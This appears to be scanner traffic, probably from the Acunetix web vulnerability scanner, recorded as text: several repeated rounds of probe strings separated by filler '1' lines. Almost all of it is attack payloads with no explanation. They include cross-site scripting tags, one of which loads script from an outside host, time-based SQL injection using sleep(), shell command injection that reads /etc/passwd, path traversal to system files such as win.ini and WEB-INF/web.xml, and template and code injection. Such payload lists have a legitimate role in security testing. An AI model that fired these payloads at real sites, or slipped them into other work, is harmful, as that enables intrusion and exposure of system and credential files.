1<video><source onerror="javascript:prompt(911901)">

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(920401)"></g></svg>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<div style=width:expression(prompt(924290))>

response.write(9306853*9579901)

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<iframe src='data:text/html

'+response.write(9306853*9579901)+'

&cat /etc/passwd&

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(937985)>

'&cat /etc/passwd&'

"+response.write(9306853*9579901)+"

1

WEB-INF/web.xml

1

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(921874)>

"&cat /etc/passwd&"

WEB-INF\web.xml

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<img src=xyz OnErRor=prompt(944805)>

1

cat /etc/passwd

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1<img/src=">" onerror=alert(920226)>

1

1

../../../../../../../../../../etc/passwd.jpg

1

${100279+100062}

`cat /etc/passwd`

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1<ScRiPt%20>prompt(906342)</sCripT>

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1

1

1

1&n932847=v902225

1&lt

)

|cat /etc/passwd#

1some_inexistent_file_with_long_name%00.jpg

1

!(()&&!|*|*|

-1)

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

<img acu onmouseover=prompt(941111) //>

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'|'ld

testasp.vulnweb.com

^(#$!@#$)(()))******

'"()

-1))

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1<input autofocus onfocus=prompt(915611)>

1

1

1

0A8AxoNV'

"|"ld

1

1

<a href='http://www.acunetix.com'>website security</a>

.\./.\./.\./.\./.\./.\./etc/passwd

'

1

1

1

QedpXRk8')

[url=http://www.acunetix.com]website security[/url]

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"

/etc/passwd

1

1

1

1

M5bAMEUz'))

1

1_rR0Tk <ScRiPt >prompt(937860)</ScRiPt>

'

${@print(md5(acunetix_wvs_security_test))}

1

http://hit7DlhKwYwmu.bxss.me/

1

1

acunetix_wvs_invalid_filename

-1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

"

${@print(md5(acunetix_wvs_security_test))}\

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1)

http://www.acunetix.tst

comments

1

1

1

'"

||cat /etc/passwd

................etc/passwd

1

-1))

comments/.

1

1'"()&%<ScRiPt >prompt(924130)</ScRiPt>

1

<!--

&dir

mUDfoEnq'

1

1

'"()&%<ScRiPt >prompt(940588)</ScRiPt>

1

1

1

'&dir&'

b7vEl5B3')

file:///etc/passwd

1

1_951071

1

1

1

"&dir&"

TzA5NvyR'))

/\../\../\../\../\../\../\../etc/passwd

1

1

1

acu8045<s1﹥s2ʺs3ʹuca8045

|dir

1

WEB-INF/web.xml

1

1

1

acux7353z1z2abcxuca7353

'|dir

1<ScRiPt >prompt(920257)</ScRiPt>

1

1

WEB-INF\web.xml

"|dir

1<script>prompt(963694)</script>

1

../../../../../../../../../../windows/win.ini

1<ScRiPt >prompt(939822)</ScRiPt>

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?954745></ScRiPt>

../../../../../../../../../../boot.ini

1

1

1<ScRiPt >prompt(979446)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1

1

1<video><source onerror="javascript:prompt(922765)">

1

windowswin.ini

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(947703)"></g></svg>

1

response.write(9815068*9299474)

................windowswin.ini

1

1

1<div style=width:expression(prompt(937566))>

1

..\..\..\..\..\..\..\..\windows\win.ini

'+response.write(9815068*9299474)+'

1

1

1<iframe src='data:text/html

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

"+response.write(9815068*9299474)+"

1

&cat /etc/passwd&

1

1

1

1<body onload=prompt(975943)>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(934229)>

1

"&cat /etc/passwd&"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

../../../../../../../../../../etc/passwd

1

1

1<img src=xyz OnErRor=prompt(969090)>

cat /etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

1

${100360+99003}

1

1<img/src=">" onerror=alert(924543)>

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

`cat /etc/passwd`

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

WEB-INF/web.xml

1

1

1

1

-1

1<ScRiPt%20>prompt(962767)</sCripT>

1

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

|cat /etc/passwd#

WEB-INF\web.xml

1

../../../../../../../../../../etc/passwd.jpg

-1)

1

)

1&lt

1some_inexistent_file_with_long_name%00.jpg

1&n946057=v988936

'|'ld

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

-1))

1

!(()&&!|*|*|

<img acu onmouseover=prompt(960934) //>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

'"()

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"|"ld

iC4z0WK7'

1<input autofocus onfocus=prompt(901785)>

^(#$!@#$)(()))******

testasp.vulnweb.com

1

1

<a href='http://www.acunetix.com'>website security</a>

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

KsdfoVLE')

1

1

1

1

'

1

[url=http://www.acunetix.com]website security[/url]

'

.\./.\./.\./.\./.\./.\./etc/passwd

YtIzfiab'))

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

"

"

1

1_h8EUd <ScRiPt >prompt(920043)</ScRiPt>

/etc/passwd

-1

1

${@print(md5(acunetix_wvs_security_test))}

1

1

||cat /etc/passwd

1

1

1

&dir

-1)

${@print(md5(acunetix_wvs_security_test))}\

1

1

http://hitjXaL2x70ia.bxss.me/

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

'&dir&'

-1))

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

acunetix_wvs_invalid_filename

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

4dHS0Ou9'

1

comments

"&dir&"

1

1

1

................etc/passwd

GC4Qbk9P')

'"

1'"()&%<ScRiPt >prompt(923983)</ScRiPt>

http://www.acunetix.tst

comments

1

|dir

<!--

DADlX8Zz'))

comments/.

1

'"()&%<ScRiPt >prompt(942563)</ScRiPt>

1

1

file:///etc/passwd

1

'|dir

1

1

1

1_925122

1

/\../\../\../\../\../\../\../etc/passwd

1

1

"|dir

1

1

WEB-INF/web.xml

1

1

WEB-INF\web.xml

1

1

1

../../../../../../../../../../windows/win.ini

acu1294<s1﹥s2ʺs3ʹuca1294

1

1

1

acux9685z1z2abcxuca9685

../../../../../../../../../../boot.ini

1

1<ScRiPt >prompt(953845)</ScRiPt>

1

1

1<script>prompt(980521)</script>

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1<ScRiPt >prompt(973714)</ScRiPt>

windowswin.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?979749></ScRiPt>

1

1

................windowswin.ini

1<ScRiPt >prompt(965224)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<video><source onerror="javascript:prompt(909479)">

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(921830)"></g></svg>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1

1<div style=width:expression(prompt(983624))>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

response.write(9947187*9646414)

1<iframe src='data:text/html

1

1

1

1

'+response.write(9947187*9646414)+'

1<body onload=prompt(980527)>

&cat /etc/passwd&

1

1

"+response.write(9947187*9646414)+"

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(939238)>

1

WEB-INF/web.xml

1

'&cat /etc/passwd&'

1

1<img src=xyz OnErRor=prompt(975862)>

1

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

WEB-INF\web.xml

"&cat /etc/passwd&"

1

1<img/src=">" onerror=alert(981698)>

1

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

1<ScRiPt%20>prompt(936300)</sCripT>

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

cat /etc/passwd

1

1

1

1

1&lt

-1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

`cat /etc/passwd`

1

${99624+100383}

1

<img acu onmouseover=prompt(985474) //>

-1)

1

1

1

../../../../../../../../../../etc/passwd.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

|cat /etc/passwd#

1<input autofocus onfocus=prompt(913397)>

-1))

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1&n983903=v933420

<a href='http://www.acunetix.com'>website security</a>

HzUY4IOA'

1some_inexistent_file_with_long_name%00.jpg

1

1

'|'ld

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

DaDjmy5I')

[url=http://www.acunetix.com]website security[/url]

)

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

"|"ld

1

'"()

http://testasp.vulnweb.com/t/xss.html?%00.jpg

AG8gW5nm'))

/../..//../..//../..//../..//../..//etc/passwd.jpg

1_3q61c <ScRiPt >prompt(998560)</ScRiPt>

!(()&&!|*|*|

testasp.vulnweb.com

1

1

1

'

-1

.\./.\./.\./.\./.\./.\./etc/passwd

1

^(#$!@#$)(()))******

1

1

-1)

"

'

1

1

/etc/passwd

1

http://hit3VU8Q266CS.bxss.me/

1

1

-1))

${@print(md5(acunetix_wvs_security_test))}

1

"

acunetix_wvs_invalid_filename

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

UF9wb9yW'

1

${@print(md5(acunetix_wvs_security_test))}\

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

||cat /etc/passwd

comments

1

1

f51YdJ2W')

1

1

http://www.acunetix.tst

1

................etc/passwd

comments

&dir

1

1

1'"()&%<ScRiPt >prompt(997995)</ScRiPt>

'"

3bA3xXeq'))

comments/.

'&dir&'

1

1

'"()&%<ScRiPt >prompt(968023)</ScRiPt>

<!--

1

1

"&dir&"

file:///etc/passwd

1

1_961841

1

1

1

1

1

1

1

/\../\../\../\../\../\../\../etc/passwd

|dir

1

'|dir

1

1

WEB-INF/web.xml

acu7578<s1﹥s2ʺs3ʹuca7578

"|dir

1

1

1

1

WEB-INF\web.xml

acux4651z1z2abcxuca4651

1

1

1

1

../../../../../../../../../../windows/win.ini

1<ScRiPt >prompt(999218)</ScRiPt>

1

1

../../../../../../../../../../boot.ini

1<script>prompt(973256)</script>

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt >prompt(960748)</ScRiPt>

1

1

1

1

windowswin.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?951866></ScRiPt>

1

1

1

1<ScRiPt >prompt(973676)</ScRiPt>

1

................windowswin.ini

1

1

1<video><source onerror="javascript:prompt(960604)">

..\..\..\..\..\..\..\..\windows\win.ini

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(951394)"></g></svg>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<div style=width:expression(prompt(935476))>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

response.write(9563990*9761849)

1

1<iframe src='data:text/html

1

'+response.write(9563990*9761849)+'

1

&cat /etc/passwd&

1<body onload=prompt(939559)>

1

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF/web.xml

"+response.write(9563990*9761849)+"

'&cat /etc/passwd&'

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(941004)>

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

WEB-INF\web.xml

1

1

1<img src=xyz OnErRor=prompt(921394)>

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

cat /etc/passwd

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<img/src=">" onerror=alert(925118)>

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

`cat /etc/passwd`

../../../../../../../../../../etc/passwd.jpg

1

1

1

1

1<ScRiPt%20>prompt(936483)</sCripT>

1

-1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

|cat /etc/passwd#

1

1

1

1&lt

1

'|'ld

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1)

1

1

<img acu onmouseover=prompt(971277) //>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

${100134+99878}

1

1some_inexistent_file_with_long_name%00.jpg

"|"ld

1

)

1&n998772=v922464

-1))

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<input autofocus onfocus=prompt(957695)>

1

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

.\./.\./.\./.\./.\./.\./etc/passwd

x7rWarov'

1

<a href='http://www.acunetix.com'>website security</a>

'

1

testasp.vulnweb.com

^(#$!@#$)(()))******

http://testasp.vulnweb.com/t/xss.html?%00.jpg

r7av0uXX')

/etc/passwd

[url=http://www.acunetix.com]website security[/url]

'

'"()

1

"

1

1

1

JSa0zO8Y'))

1_11KxO <ScRiPt >prompt(913786)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

"

||cat /etc/passwd

1

1

1

1

1

-1

1

1

${@print(md5(acunetix_wvs_security_test))}

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

&dir

1

1

acunetix_wvs_invalid_filename

http://hitNfU9aoQKid.bxss.me/

${@print(md5(acunetix_wvs_security_test))}\

1

'&dir&'

1

-1)

................etc/passwd

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

comments

1

1

"&dir&"

-1))

1

1

1

http://www.acunetix.tst

comments

1

nkSyCclL'

'"

|dir

1'"()&%<ScRiPt >prompt(959278)</ScRiPt>

file:///etc/passwd

comments/.

JN8nkyrj')

1

<!--

1

1

'"()&%<ScRiPt >prompt(954717)</ScRiPt>

ucfJpBLc'))

1

'|dir

/\../\../\../\../\../\../\../etc/passwd

1

"|dir

1

1_952479

1

1

1

1

1

1

WEB-INF/web.xml

1

1

1

1

WEB-INF\web.xml

1

1

1

1

1

1

../../../../../../../../../../windows/win.ini

acu5525<s1﹥s2ʺs3ʹuca5525

1

../../../../../../../../../../boot.ini

1

1

acux2373z1z2abcxuca2373

1

1

1<ScRiPt >prompt(961665)</ScRiPt>

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1<script>prompt(912722)</script>

1

1

windowswin.ini

1<ScRiPt >prompt(929531)</ScRiPt>

1

1

1

1

................windowswin.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?986081></ScRiPt>

1

1

1

1<ScRiPt >prompt(966959)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<video><source onerror="javascript:prompt(921136)">

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(928645)"></g></svg>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

response.write(9839862*9746275)

1<div style=width:expression(prompt(917699))>

1

1

'+response.write(9839862*9746275)+'

1<iframe src='data:text/html

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

&cat /etc/passwd&

"+response.write(9839862*9746275)+"

1<body onload=prompt(950301)>

SomeCustomInjectedHeader:injected_by_wvs

1

1

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

1

1

WEB-INF/web.xml

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(980101)>

SomeCustomInjectedHeader:injected_by_wvs

1

1<img src=xyz OnErRor=prompt(919035)>

"&cat /etc/passwd&"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

WEB-INF\web.xml

1

1

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

1<img/src=">" onerror=alert(939004)>

1

../../../../../../../../../../etc/passwd.jpg

cat /etc/passwd

1

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

${99007+100041}

1<ScRiPt%20>prompt(918311)</sCripT>

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

`cat /etc/passwd`

1

1

1

-1

1&lt

1

1

1&n974557=v988998

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1)

)

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

|cat /etc/passwd#

<img acu onmouseover=prompt(997386) //>

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

-1))

1

'|'ld

1some_inexistent_file_with_long_name%00.jpg

!(()&&!|*|*|

1<input autofocus onfocus=prompt(900562)>

1

'"()

"|"ld

At8I1tSF'

^(#$!@#$)(()))******

<a href='http://www.acunetix.com'>website security</a>

.\./.\./.\./.\./.\./.\./etc/passwd

'

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

http://testasp.vulnweb.com/t/xss.html?%00.jpg

[url=http://www.acunetix.com]website security[/url]

1

JyMea1c9')

1

1

"

/etc/passwd

testasp.vulnweb.com

1

kQkBJwBB'))

1_ZUBBZ <ScRiPt >prompt(903714)</ScRiPt>

1

${@print(md5(acunetix_wvs_security_test))}

1

'

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

-1

1

http://hitD9JJOjZSN4.bxss.me/

1

${@print(md5(acunetix_wvs_security_test))}\

1

"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

acunetix_wvs_invalid_filename

-1)

1

1

1

1

||cat /etc/passwd

comments

-1))

1

................etc/passwd

1

1

1

1

&dir

comments

4g1XQdAg'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

http://www.acunetix.tst

'"

1

'&dir&'

comments/.

o1eSKZCi')

1'"()&%<ScRiPt >prompt(962047)</ScRiPt>

1

1

file:///etc/passwd

1

<!--

1

xyBl7Oer'))

1

'"()&%<ScRiPt >prompt(936632)</ScRiPt>

"&dir&"

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1

1

WEB-INF/web.xml

1

1_969672

1

1

|dir

WEB-INF\web.xml

1

1

../../../../../../../../../../windows/win.ini

1

'|dir

1

../../../../../../../../../../boot.ini

acu10561<s1﹥s2ʺs3ʹuca10561

1

1

../../../../../../../../../../windows/win.ini.jpg

"|dir

acux10032z1z2abcxuca10032

1

windowswin.ini

1<ScRiPt >prompt(929483)</ScRiPt>

1

1

1

................windowswin.ini

1<script>prompt(931622)</script>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(999888)</ScRiPt>

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?987767></ScRiPt>

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

1

1<ScRiPt >prompt(923615)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

response.write(9405057*9029688)

1

1<video><source onerror="javascript:prompt(903435)">

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

'+response.write(9405057*9029688)+'

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(950644)"></g></svg>

1

1

1

"+response.write(9405057*9029688)+"

&cat /etc/passwd&

1<div style=width:expression(prompt(991799))>

1

1

1

WEB-INF/web.xml

SomeCustomInjectedHeader:injected_by_wvs

1

1<iframe src='data:text/html

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

WEB-INF\web.xml

../../../../../../../../../../etc/passwd

1<body onload=prompt(900203)>

1

"&cat /etc/passwd&"

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(913053)>

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

cat /etc/passwd

1

1<img src=xyz OnErRor=prompt(957780)>

1

1

1<img/src=">" onerror=alert(998911)>

1

1

`cat /etc/passwd`

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

../../../../../../../../../../etc/passwd.jpg

1<ScRiPt%20>prompt(982086)</sCripT>

1

1

1

${100024+99933}

1

-1

|cat /etc/passwd#

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1&n914829=v990598

1&lt

)

1

1

-1)

1

'|'ld

1some_inexistent_file_with_long_name%00.jpg

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

!(()&&!|*|*|

<img acu onmouseover=prompt(989923) //>

1

-1))

1

^(#$!@#$)(()))******

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

"|"ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

'"()

1<input autofocus onfocus=prompt(952102)>

HCz0b6KC'

1

1

'

1

testasp.vulnweb.com

1

.\./.\./.\./.\./.\./.\./etc/passwd

lTSJb6Yt')

<a href='http://www.acunetix.com'>website security</a>

"

1

1

1

1

1

'

/etc/passwd

wenkYkF4'))

[url=http://www.acunetix.com]website security[/url]

${@print(md5(acunetix_wvs_security_test))}

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"

1

1

1_jRa5M <ScRiPt >prompt(926424)</ScRiPt>

-1

1

${@print(md5(acunetix_wvs_security_test))}\

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

||cat /etc/passwd

1

1

-1)

acunetix_wvs_invalid_filename

1

-1))

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

http://hitBfnfIS0J8p.bxss.me/

1

&dir

1

1

comments

wFywzrKe'

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

................etc/passwd

1

'&dir&'

http://www.acunetix.tst

comments

Sn3AJkEO')

1

1

1

1

'"

file:///etc/passwd

vNHihzIW'))

comments/.

"&dir&"

1

1

1

1'"()&%<ScRiPt >prompt(905295)</ScRiPt>

<!--

/\../\../\../\../\../\../\../etc/passwd

1

1

1

|dir

'"()&%<ScRiPt >prompt(953353)</ScRiPt>

1

1

1

WEB-INF/web.xml

1_902472

1

1

WEB-INF\web.xml

'|dir

1

1

1

../../../../../../../../../../windows/win.ini

1

"|dir

1

acu3263<s1﹥s2ʺs3ʹuca3263

../../../../../../../../../../boot.ini

1

1

acux7761z1z2abcxuca7761

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1<ScRiPt >prompt(929142)</ScRiPt>

windowswin.ini

1<script>prompt(974726)</script>

1

1

1

1

1<ScRiPt >prompt(986678)</ScRiPt>

1

................windowswin.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?948190></ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1<ScRiPt >prompt(934562)</ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<video><source onerror="javascript:prompt(915095)">

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(908244)"></g></svg>

1

response.write(9981903*9641237)

1

'+response.write(9981903*9641237)+'

1<div style=width:expression(prompt(914848))>

1

1

&cat /etc/passwd&

WEB-INF/web.xml

1

1<iframe src='data:text/html

"+response.write(9981903*9641237)+"

WEB-INF\web.xml

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1<body onload=prompt(965428)>

1

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

../../../../../../../../../../etc/passwd

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(998438)>

1

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

cat /etc/passwd

1

1

if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/

1

1

1

1<img src=xyz OnErRor=prompt(968880)>

../../../../../../../../../../etc/passwd.jpg

1

1

${99426+99963}

`cat /etc/passwd`

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<img/src=">" onerror=alert(938977)>

1

1

1

1

1&n950873=v982758

1some_inexistent_file_with_long_name%00.jpg

|cat /etc/passwd#

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1<ScRiPt%20>prompt(991528)</sCripT>

)

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

-1

'|'ld

1&lt

!(()&&!|*|*|

1

1

'"()

/../..//../..//../..//../..//../..//etc/passwd.jpg

-1)

testasp.vulnweb.com

<img acu onmouseover=prompt(976201) //>

"|"ld

1

1

^(#$!@#$)(()))******

1

.\./.\./.\./.\./.\./.\./etc/passwd

-1))

'

1

1<input autofocus onfocus=prompt(978223)>

1

1

1

1

/etc/passwd

llgGwkzy'

1

1

"

<a href='http://www.acunetix.com'>website security</a>

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

lC86jMVp')

'

1

1

1

${@print(md5(acunetix_wvs_security_test))}

[url=http://www.acunetix.com]website security[/url]

1

1

1

DmVWSjdW'))

http://hitUTfTBRATp8.bxss.me/

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

"

1

1_yhBBH <ScRiPt >prompt(968258)</ScRiPt>

1

1

acunetix_wvs_invalid_filename

1

1

1

................etc/passwd

-1

